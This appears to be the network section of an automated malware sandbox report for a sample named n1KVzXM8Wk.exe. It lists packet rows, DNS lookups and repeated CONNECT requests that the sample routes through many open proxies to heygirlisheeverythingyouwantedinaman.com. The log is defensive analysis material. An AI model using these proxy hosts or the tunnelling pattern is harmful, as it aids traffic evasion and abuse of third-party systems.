                                                                                                      Feb 23, 2024 09:45:18.151562929 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.151622057 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.151634932 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.151638031 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:18.151686907 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:18.153639078 CET414550301104.200.135.46192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.162478924 CET5012522093192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:18.162906885 CET33124977078.47.35.35192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.162947893 CET5012720627192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:18.162988901 CET497703312192.168.2.478.47.35.35
                                                                                                      Feb 23, 2024 09:45:18.170692921 CET41454986472.37.216.68192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.177081108 CET567850342223.25.101.86192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.177995920 CET5056335010192.168.2.4185.215.160.118
                                                                                                      Feb 23, 2024 09:45:18.178913116 CET2005649818103.215.139.32192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.178946018 CET5042780192.168.2.450.222.245.40
                                                                                                      Feb 23, 2024 09:45:18.178946972 CET49964543192.168.2.48.213.137.155
                                                                                                      Feb 23, 2024 09:45:18.179362059 CET21915046072.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.179418087 CET86355005272.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.179440975 CET167035005972.10.160.93192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.183144093 CET4531450307104.238.100.115192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.184581041 CET99950250190.61.48.24192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.193603992 CET5039334041192.168.2.4185.225.200.247
                                                                                                      Feb 23, 2024 09:45:18.193619967 CET498125678192.168.2.4182.93.69.74
                                                                                                      Feb 23, 2024 09:45:18.193723917 CET4980951040192.168.2.4104.248.151.220
                                                                                                      Feb 23, 2024 09:45:18.193790913 CET498165678192.168.2.4136.228.160.250
                                                                                                      Feb 23, 2024 09:45:18.195262909 CET808050337103.172.1.35192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.196305037 CET1531150544184.178.172.13192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.196374893 CET5054415311192.168.2.4184.178.172.13
                                                                                                      Feb 23, 2024 09:45:18.201373100 CET414550305199.102.106.94192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.207283974 CET805035950.172.39.98192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.207849026 CET805042668.188.59.198192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.207928896 CET31284985346.101.102.134192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.209230900 CET5048180192.168.2.450.173.140.145
                                                                                                      Feb 23, 2024 09:45:18.209243059 CET5037733429192.168.2.4193.106.57.7
                                                                                                      Feb 23, 2024 09:45:18.209253073 CET5033080192.168.2.450.200.12.86
                                                                                                      Feb 23, 2024 09:45:18.210520029 CET250535006967.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.210556984 CET253415007167.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.210771084 CET414550321134.236.118.74192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.211358070 CET31285020237.156.28.43192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.212035894 CET5242050255162.214.102.121192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.216327906 CET8050081103.44.239.244192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.216839075 CET8050081103.44.239.244192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.216866970 CET8050081103.44.239.244192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.216902018 CET5008180192.168.2.4103.44.239.244
                                                                                                      Feb 23, 2024 09:45:18.216922998 CET5008180192.168.2.4103.44.239.244
                                                                                                      Feb 23, 2024 09:45:18.217060089 CET8050081103.44.239.244192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.217735052 CET5008180192.168.2.4103.44.239.244
                                                                                                      Feb 23, 2024 09:45:18.223751068 CET31285028885.214.244.174192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.224857092 CET5016714745192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:18.224879026 CET4982052982192.168.2.4188.165.237.26
                                                                                                      Feb 23, 2024 09:45:18.224890947 CET505709292192.168.2.4177.54.229.0
                                                                                                      Feb 23, 2024 09:45:18.225332022 CET8050098190.58.248.86192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.226326942 CET291295011072.10.160.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.228763103 CET567850246109.205.243.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.229473114 CET805036335.185.254.159192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.234360933 CET900250077120.234.203.171192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.240478039 CET502086533192.168.2.467.43.227.227
                                                                                                      Feb 23, 2024 09:45:18.240497112 CET498245678192.168.2.441.90.242.102
                                                                                                      Feb 23, 2024 09:45:18.240497112 CET4982223670192.168.2.4161.97.173.42
                                                                                                      Feb 23, 2024 09:45:18.241877079 CET16114998272.10.160.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.242592096 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.242605925 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.242662907 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:18.242719889 CET143134999467.43.228.253192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.243793964 CET312850043185.105.230.45192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.243859053 CET500433128192.168.2.4185.105.230.45
                                                                                                      Feb 23, 2024 09:45:18.244473934 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.250071049 CET31285018294.142.142.140192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.250376940 CET805041950.218.57.69192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.255999088 CET307835043167.43.228.253192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.256097078 CET498299090192.168.2.4189.240.60.171
                                                                                                      Feb 23, 2024 09:45:18.257638931 CET220935012567.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.257671118 CET498323128192.168.2.4212.77.163.196
                                                                                                      Feb 23, 2024 09:45:18.257846117 CET206275012767.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.259685993 CET999950300171.35.172.147192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.264094114 CET4232549919139.99.9.218192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.271729946 CET505735678192.168.2.489.161.90.203
                                                                                                      Feb 23, 2024 09:45:18.271747112 CET4999554330192.168.2.4206.189.15.100
                                                                                                      Feb 23, 2024 09:45:18.271779060 CET498301976192.168.2.441.65.236.39
                                                                                                      Feb 23, 2024 09:45:18.274792910 CET99950388191.97.16.160192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.274827003 CET4983613629192.168.2.4113.53.29.228
                                                                                                      Feb 23, 2024 09:45:18.274950981 CET5057659179192.168.2.4162.243.55.12
                                                                                                      Feb 23, 2024 09:45:18.281148911 CET805021050.231.104.58192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.281950951 CET2550850074107.180.89.55192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.281963110 CET2550850074107.180.89.55192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.282027960 CET5007425508192.168.2.4107.180.89.55
                                                                                                      Feb 23, 2024 09:45:18.284537077 CET31284987091.149.224.168192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.287362099 CET505596984192.168.2.4162.214.170.144
                                                                                                      Feb 23, 2024 09:45:18.287362099 CET4984046849192.168.2.4162.241.46.54
                                                                                                      Feb 23, 2024 09:45:18.287379980 CET4995322035192.168.2.467.43.227.228
                                                                                                      Feb 23, 2024 09:45:18.287874937 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.294409990 CET8050406149.202.172.113192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.301541090 CET108249736181.209.113.234192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.302979946 CET5052280192.168.2.450.218.57.74
                                                                                                      Feb 23, 2024 09:45:18.302995920 CET5058080192.168.2.420.78.102.191
                                                                                                      Feb 23, 2024 09:45:18.303003073 CET5058180192.168.2.4196.1.95.124
                                                                                                      Feb 23, 2024 09:45:18.303003073 CET49843999192.168.2.4201.174.175.82
                                                                                                      Feb 23, 2024 09:45:18.303026915 CET498554153192.168.2.4103.60.137.17
                                                                                                      Feb 23, 2024 09:45:18.303030014 CET5013780192.168.2.450.168.163.178
                                                                                                      Feb 23, 2024 09:45:18.305217981 CET312850362144.21.53.111192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.306648970 CET6460850557207.180.226.58192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.306720018 CET5055764608192.168.2.4207.180.226.58
                                                                                                      Feb 23, 2024 09:45:18.314014912 CET319794989451.77.73.67192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.318656921 CET5058226439192.168.2.492.205.28.187
                                                                                                      Feb 23, 2024 09:45:18.318661928 CET498655678192.168.2.480.54.62.254
                                                                                                      Feb 23, 2024 09:45:18.318690062 CET498578080192.168.2.479.174.188.153
                                                                                                      Feb 23, 2024 09:45:18.319797039 CET147455016767.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.320337057 CET6269149792162.215.223.76192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.320417881 CET4979262691192.168.2.4162.215.223.76
                                                                                                      Feb 23, 2024 09:45:18.322524071 CET808050153190.57.245.250192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.324826002 CET4282349803207.180.234.220192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.324904919 CET4980342823192.168.2.4207.180.234.220
                                                                                                      Feb 23, 2024 09:45:18.334239960 CET5058435087192.168.2.4162.240.10.35
                                                                                                      Feb 23, 2024 09:45:18.334259033 CET501994153192.168.2.4103.117.109.9
                                                                                                      Feb 23, 2024 09:45:18.334290028 CET498808080192.168.2.4103.163.80.14
                                                                                                      Feb 23, 2024 09:45:18.334299088 CET505648080192.168.2.495.47.119.122
                                                                                                      Feb 23, 2024 09:45:18.334304094 CET5029610801192.168.2.495.111.91.50
                                                                                                      Feb 23, 2024 09:45:18.334309101 CET5052780192.168.2.4113.252.40.144
                                                                                                      Feb 23, 2024 09:45:18.334323883 CET5056580192.168.2.4175.213.76.24
                                                                                                      Feb 23, 2024 09:45:18.334323883 CET502303128192.168.2.4186.156.161.235
                                                                                                      Feb 23, 2024 09:45:18.334323883 CET499935678192.168.2.4125.26.22.7
                                                                                                      Feb 23, 2024 09:45:18.334327936 CET505678080192.168.2.4190.187.201.26
                                                                                                      Feb 23, 2024 09:45:18.334351063 CET4978680192.168.2.4154.113.121.60
                                                                                                      Feb 23, 2024 09:45:18.334355116 CET501428000192.168.2.4137.184.22.92
                                                                                                      Feb 23, 2024 09:45:18.334353924 CET5015480192.168.2.414.43.238.82
                                                                                                      Feb 23, 2024 09:45:18.334353924 CET498233180192.168.2.445.179.71.90
                                                                                                      Feb 23, 2024 09:45:18.334358931 CET500574145192.168.2.4107.181.168.145
                                                                                                      Feb 23, 2024 09:45:18.334359884 CET500466441192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:18.334362984 CET5005527645192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:18.334367990 CET5013927917192.168.2.467.43.227.228
                                                                                                      Feb 23, 2024 09:45:18.334392071 CET5046110005192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:18.334394932 CET498273128192.168.2.4154.83.10.137
                                                                                                      Feb 23, 2024 09:45:18.334392071 CET5019810739192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:18.334392071 CET5016112707192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:18.334393978 CET5051814917192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:18.334407091 CET498288080192.168.2.4103.247.21.98
                                                                                                      Feb 23, 2024 09:45:18.334412098 CET501168080192.168.2.4112.205.92.14
                                                                                                      Feb 23, 2024 09:45:18.334423065 CET505725678192.168.2.4130.193.123.34
                                                                                                      Feb 23, 2024 09:45:18.334433079 CET4983780192.168.2.4159.65.245.255
                                                                                                      Feb 23, 2024 09:45:18.334434032 CET498385678192.168.2.4116.118.98.9
                                                                                                      Feb 23, 2024 09:45:18.334441900 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:18.334440947 CET4983959341192.168.2.4200.6.175.10
                                                                                                      Feb 23, 2024 09:45:18.334441900 CET505791994192.168.2.445.173.12.141
                                                                                                      Feb 23, 2024 09:45:18.334440947 CET4984643110192.168.2.489.22.17.62
                                                                                                      Feb 23, 2024 09:45:18.334450960 CET49842999192.168.2.4201.77.108.1
                                                                                                      Feb 23, 2024 09:45:18.334450960 CET4984929466192.168.2.466.228.33.190
                                                                                                      Feb 23, 2024 09:45:18.334455013 CET5002680192.168.2.450.172.75.124
                                                                                                      Feb 23, 2024 09:45:18.334460974 CET498358080192.168.2.4107.178.9.186
                                                                                                      Feb 23, 2024 09:45:18.334465027 CET4985026777192.168.2.4185.129.250.183
                                                                                                      Feb 23, 2024 09:45:18.334470034 CET500003128192.168.2.437.120.222.132
                                                                                                      Feb 23, 2024 09:45:18.334479094 CET498545678192.168.2.4110.78.164.224
                                                                                                      Feb 23, 2024 09:45:18.334482908 CET5009531602192.168.2.449.13.116.170
                                                                                                      Feb 23, 2024 09:45:18.334485054 CET4985880192.168.2.48.217.118.156
                                                                                                      Feb 23, 2024 09:45:18.334486961 CET4999931979192.168.2.451.77.73.78
                                                                                                      Feb 23, 2024 09:45:18.334501028 CET4985980192.168.2.4146.59.243.214
                                                                                                      Feb 23, 2024 09:45:18.334502935 CET498638080192.168.2.4101.255.166.2
                                                                                                      Feb 23, 2024 09:45:18.334539890 CET4986783192.168.2.445.119.113.62
                                                                                                      Feb 23, 2024 09:45:18.335622072 CET65335020867.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.337215900 CET805048150.173.140.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.339627028 CET805042750.222.245.40192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.339639902 CET5678502981.15.62.12192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.339706898 CET502985678192.168.2.41.15.62.12
                                                                                                      Feb 23, 2024 09:45:18.347475052 CET8349802103.155.54.38192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.349878073 CET501838000192.168.2.4128.199.252.22
                                                                                                      Feb 23, 2024 09:45:18.349890947 CET5006180192.168.2.450.172.75.120
                                                                                                      Feb 23, 2024 09:45:18.349890947 CET498731976192.168.2.441.65.55.10
                                                                                                      Feb 23, 2024 09:45:18.349989891 CET4987649401192.168.2.4162.241.46.40
                                                                                                      Feb 23, 2024 09:45:18.350632906 CET8050034211.128.96.206192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.354737997 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.354778051 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.354801893 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.354820967 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:18.354863882 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.354876995 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.354890108 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:18.354901075 CET501603128192.168.2.4185.165.46.208
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Feb 23, 2024 09:45:13.651319027 CET192.168.2.41.1.1.10x3341Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:20.350759029 CET192.168.2.41.1.1.10xec6eStandard query (0)heygirlisheeverythingyouwantedinaman.comA (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:28.469517946 CET192.168.2.41.1.1.10x47fStandard query (0)repository.gij.edu.ghA (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:35.073060989 CET192.168.2.41.1.1.10x492dStandard query (0)ktxcomay.com.vnA (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:42.364151001 CET192.168.2.41.1.1.10xfd38Standard query (0)mail.bananasnevis.comA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Feb 23, 2024 09:45:13.739494085 CET1.1.1.1192.168.2.40x3341No error (0)github.com140.82.114.3A (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:20.532187939 CET1.1.1.1192.168.2.40xec6eNo error (0)heygirlisheeverythingyouwantedinaman.com172.67.190.93A (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:20.532187939 CET1.1.1.1192.168.2.40xec6eNo error (0)heygirlisheeverythingyouwantedinaman.com104.21.57.121A (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:28.751698017 CET1.1.1.1192.168.2.40x47fNo error (0)repository.gij.edu.gh102.223.20.217A (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:35.693661928 CET1.1.1.1192.168.2.40x492dNo error (0)ktxcomay.com.vn222.255.238.159A (IP address)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:42.547461987 CET1.1.1.1192.168.2.40xfd38No error (0)mail.bananasnevis.combananasnevis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Feb 23, 2024 09:45:42.547461987 CET1.1.1.1192.168.2.40xfd38No error (0)bananasnevis.com64.202.191.120A (IP address)IN (0x0001)false
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449734104.23.141.196806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:14.973916054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.061481953 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449741104.27.122.6806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:14.990271091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.077822924 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449733107.181.148.18760476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.056992054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.392692089 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449748160.153.245.18754366812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.093895912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.568629980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.099895000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.162365913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.349992990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.587069988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.830086946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.109492064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647262096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449739107.148.99.107583946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.147403955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.740659952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.521734953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.146838903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.334781885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.464864969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.700159073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.943977118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.396753073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.4498048.213.128.904436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.156301975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.4498068.213.128.904436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.160916090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.4498088.213.128.904436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
